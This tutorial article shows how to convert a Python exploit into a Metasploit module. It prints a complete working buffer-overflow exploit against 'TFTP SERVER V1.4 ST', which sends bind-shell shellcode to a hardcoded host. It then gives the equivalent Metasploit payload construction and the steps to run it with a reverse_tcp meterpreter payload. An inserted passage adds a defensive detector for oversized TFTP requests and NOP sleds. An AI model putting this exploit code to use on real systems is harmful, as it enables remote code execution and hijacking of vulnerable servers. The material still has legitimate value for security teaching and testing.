Aim

The Metasploit Framework is an open source project that is quite popular amongst security analysts. Most existing exploits are written in C, Python, Perl and so on, so to make well-known exploits more widely usable for testing it is advisable to port them into the Metasploit Framework. Since Metasploit became active only in 2009, many exploits have still not been converted. This article walks the reader through converting an exploit from another language into a Metasploit module.

Method

To convert exploits written in Python or other languages into Metasploit, we first have to know the structure of a Metasploit module. That structure can be generated automatically with mona.py for any exploit type. Install Immunity Debugger first, then copy mona.py into its PyCommands directory.

Configuring the Immunity debugger with mona

Step 1. Open Immunity Debugger and type "!mona help assemble".

Step 2. To set the folder where the generated exploit file is stored, type "!mona config -set workingfolder d:\logs\%p" (create the folder logs on the d: drive first).

Converting the Python exploit

Consider the Python exploit given below:

import socket
import sys

host = '192.168.28.130'
port = 69
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)  # udp connection
except:
    print "socket() failed"
    sys.exit(1)
# msfpayload windows/shell_bind_tcp -b \x00
# this will give you the command shell of the victim
shell = (
    "\xbb\x3c\xef\xdb\xc5\xdb\xdd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
    "\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\xde\x1a\x27\x2d\x97"
    "\xe5\xd8\xae\xc7\x6c\x3d\x9f\xd5\x0b\x35\xb2\xe9\x58\x1b\x3f"
    "\x82\x0d\x88\xb4\xe6\x99\xbf\x7d\x4c\xfc\x8e\x7e\x61\xc0\x5d"
    "\xbc\xe0\xbc\x9f\x91\xc2\xfd\x6f\xe4\x03\x39\x8d\x07\x51\x92"
    "\xd9\xba\x45\x97\x9c\x06\x64\x77\xab\x37\x1e\xf2\x6c\xc3\x94"
    "\xfd\xbc\x7c\xa3\xb6\x24\xf6\xeb\x66\x54\xdb\xe8\x5b\x1f\x50"
    "\xda\x28\x9e\xb0\x13\xd0\x90\xfc\xff\xef\x1c\xf1\xfe\x28\x9a"
    "\xea\x75\x43\xd8\x97\x8d\x90\xa2\x43\x18\x05\x04\x07\xba\xed"
    "\xb4\xc4\x5c\x65\xba\xa1\x2b\x21\xdf\x34\xf8\x59\xdb\xbd\xff"
    "\x8d\x6d\x85\xdb\x09\x35\x5d\x42\x0b\x93\x30\x7b\x4b\x7b\xec"
    "\xd9\x07\x6e\xf9\x5b\x4a\xe7\xce\x51\x75\xf7\x58\xe2\x06\xc5"
    "\xc7\x58\x81\x65\x8f\x46\x56\x89\xba\x3e\xc8\x74\x45\x3e\xc0"
    "\xb2\x11\x6e\x7a\x12\x1a\xe5\x7a\x9b\xcf\xa9\x2a\x33\xa0\x09"
    "\x9b\xf3\x10\xe1\xf1\xfb\x4f\x11\xfa\xd1\xf9\x16\x6d\x1a\x51"
    "\xf7\xea\xf2\xa0\x07\xd4\x06\x2c\xe1\x70\x17\x78\xba\xec\x8e"
    "\x21\x30\x8c\x4f\xfc\xd0\x2d\xdd\x9b\x20\x3b\xfe\x33\x77\x6c"
    "\x30\x4a\x1d\x80\x6b\xe4\x03\x59\xed\xcf\x87\x86\xce\xce\x06"
    "\x4a\x6a\xf5\x18\x92\x73\xb1\x4c\x4a\x22\x6f\x3a\x2c\x9c\xc1"
    "\x94\xe6\x73\x88\x70\x7e\xb8\x0b\x06\x7f\x95\xfd\xe6\xce\x40"
    "\xb8\x19\xfe\x04\x4c\x62\xe2\xb4\xb3\xb9\xa6\xc5\xf9\xe3\x8f"
    "\x4d\xa4\x76\x92\x13\x57\xad\xd1\x2d\xd4\x47\xaa\xc9\xc4\x22"
    "\xaf\x96\x42\xdf\xdd\x87\x26\xdf\x72\xa7\x62")
# Stage 3 jump back 1490 bytes to the start of buffer
# stage 2 jmp 5 bytes to make a far jump
# stage 1 return address 0x00409605 TFTFPSERVER.EXE
stage4 = "\x90"*50 + shell
stage3 = "\xE9\x2E\xFA\xFF\xFF"
stage2 = "\xEB\xF9\x90\x90"
stage1 = "\x05\x96\x40"
filename = stage4 + "A"*(1487-len(stage4)) + stage3 + stage2 + stage1
print "file created"
mode = "netascii"
youlose = "\x00\x01" + filename + "\x00" + mode + "\x00"
s.sendto(youlose, (host, port))
print "send"

Note:

  • The variable "shell" holds 330 bytes of hex-encoded shellcode; these bytes are the payload. The buffer size here is 1490 bytes.
  • In stage 3, jump back 1490 bytes to the start of the buffer.
  • In stage 2, jump 5 bytes to make a far jump.
  • In stage 1, we specify the return address 0x00409605 in TFTFPSERVER.EXE.
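The packet the exploit sends ("\x00\x01" + filename + "\x00" + mode + "\x00") is an ordinary TFTP read request whose file name field is far larger than any real file name. The same layout is what a defender needs to parse to spot such a request on the wire. The following detector is an added example, not code from the original article: it lays out a request the same way, parses the opcode, file name and mode back out, and flags the traits that make the article's buffer stand out. The 255-byte file-name limit and the 16-byte NOP-sled threshold are assumptions chosen for illustration, and the sample packets are constructed here, not captured from the article's target.

```python
"""Parse TFTP read/write requests and flag ones shaped like an overflow attempt."""
import struct
from typing import List, Optional

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
KNOWN_MODES = {"netascii", "octet", "mail"}   # transfer modes defined by RFC 1350
MAX_SANE_FILENAME = 255                        # assumption: longer names are suspicious
NOP_SLED = b"\x90" * 16                        # assumption: 16 consecutive NOPs count as a sled


def build_request(opcode: int, filename: bytes, mode: bytes = b"netascii") -> bytes:
    """Lay out a request the way the article's 'youlose' string does:
    2-byte big-endian opcode, file name, NUL, mode, NUL."""
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


def parse_request(packet: bytes) -> Optional[dict]:
    """Return {'opcode', 'filename', 'mode'} for an RRQ/WRQ, or None for anything else."""
    if len(packet) < 4:
        return None
    opcode = struct.unpack("!H", packet[:2])[0]
    if opcode not in (1, 2):
        return None
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:            # need: filename NUL mode NUL
        return None
    return {
        "opcode": OPCODES[opcode],
        "filename": fields[0],
        "mode": fields[1].decode("ascii", "replace").lower(),
    }


def assess_request(packet: bytes) -> List[str]:
    """Return the reasons a request looks hostile; an empty list means it looks clean."""
    findings: List[str] = []
    req = parse_request(packet)
    if req is None:
        return ["not a well-formed TFTP read/write request"]
    name = req["filename"]
    if len(name) > MAX_SANE_FILENAME:
        findings.append(f"filename length {len(name)} exceeds {MAX_SANE_FILENAME}")
    non_printable = sum(1 for b in name if b < 0x20 or b > 0x7E)
    if non_printable:
        findings.append(f"{non_printable} non-printable bytes in filename")
    if NOP_SLED in name:
        findings.append("NOP sled (16+ consecutive 0x90 bytes) in filename")
    if req["mode"] not in KNOWN_MODES:
        findings.append(f"unknown transfer mode {req['mode']!r}")
    return findings


# Constructed sample traffic for the demonstration (not captured packets).
BENIGN = build_request(1, b"boot/pxelinux.cfg", b"octet")
# A 1490-byte file name of NOPs plus filler: the same size the article's note gives, with no payload.
OVERSIZED = build_request(1, b"\x90" * 50 + b"A" * 1440)

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(label, len(pkt), "bytes:", assess_request(pkt) or ["clean"])
```

Run it as a script to see the benign request pass and the oversized one trip all three length, printability and sled checks; the same assess_request() can be fed the payload of any UDP/69 datagram pulled from a capture.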

To convert this into a Metasploit module:

Step 1. From the Python exploit above we learn that the connection type is UDP, the port number is 69, and it is a TFTP exploit.

Step 2. To generate the skeleton, type "!mona skeleton" in Immunity Debugger and press Enter.

Step 3. Select the exploit type "udp" and click OK.

Step 4. Enter 69 as the remote port and click OK.

Step 5. The skeleton is now generated in d:\logs as msfskeleton.rb, a Ruby file. Rename it to something appropriate.

Step 6. Enter the author name, a description of the exploit, where it was found, etc.

Step 7. Set 'Space' to 500 in the Payload section of the Metasploit structure. This is the maximum size of the payload that can be attached (the value can be determined with Immunity Debugger).

Step 8. A hexadecimal value is assigned to the 'stage1' variable; this is the address that should replace SIP. The address is in big-endian representation; written as a normal hexadecimal number it is 0x00409605. Put that value into the Targets array in the Ruby file (the Metasploit structure). The buffer construction then becomes:

stage = ""                                                    # buffer that becomes the TFTP file name
stage << make_nops(50) + payload.encoded                      # 50 NOPs followed by the selected payload
stage << rand_text_alpha(1487-(payload.encoded.length+50))    # random filler up to the fixed offset
stage << "\xE9\x2E\xFA\xFF\xFF"                               # stage 3: jump back to the start of the buffer
stage << "\xEB\xF9\x90\x90"                                   # stage 2: short jump onto stage 3
stage << [target.ret].pack('V')                               # stage 1: return address as a 32-bit little-endian value
stage << "\x00"+"netascii"+"\x00"                             # NUL terminator, transfer mode, NUL terminator

Step 9. In the converted code, make_nops(50) inserts 50 no-op instructions. payload.encoded is the part that performs the chosen action on the victim machine.

Step 10. rand_text_alpha() generates random alphabetic filler text.

Step 11. We append the return address, packed into the format required by the target ([target.ret].pack('V')).

Running the exploit

Step 1. The parameters to be set are RHOST, LHOST and PAYLOAD.

Step 2. Select the payload; let's select windows/meterpreter/reverse_tcp.

Step 3. Run the exploit.

The exploit was tested on Windows XP SP3. To run the exploit the victim system must be running "TFTP SERVER V1.4 ST".

Metasploit code is available here.
